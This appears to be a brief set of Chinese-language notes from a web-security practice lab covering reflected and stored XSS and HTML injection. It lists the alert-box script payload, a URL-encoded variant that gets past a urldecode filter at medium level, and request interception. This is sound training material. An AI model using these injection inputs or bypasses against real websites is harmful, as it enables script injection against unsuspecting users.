xss(get)
1.low<script>alert(/xss/)</script>
2,medium
用了urldecode函数,urldecode()函数与urlencode()函数原理相反,用于解码已编码的 URL 字符串,其原理就是把十六进制字符串转换为中文字符
把代码url编码
%3cscript%3ealert(%2fxss%2f)%3c%2fscript%3e
post与get一样
HTML Injection - Reflected (URL)
<script>alert(/xss/)</script>
被url编码,通过抓包
修改
HTML Injection - Stored (Blog)
插入<script>alert(/xss/)</script>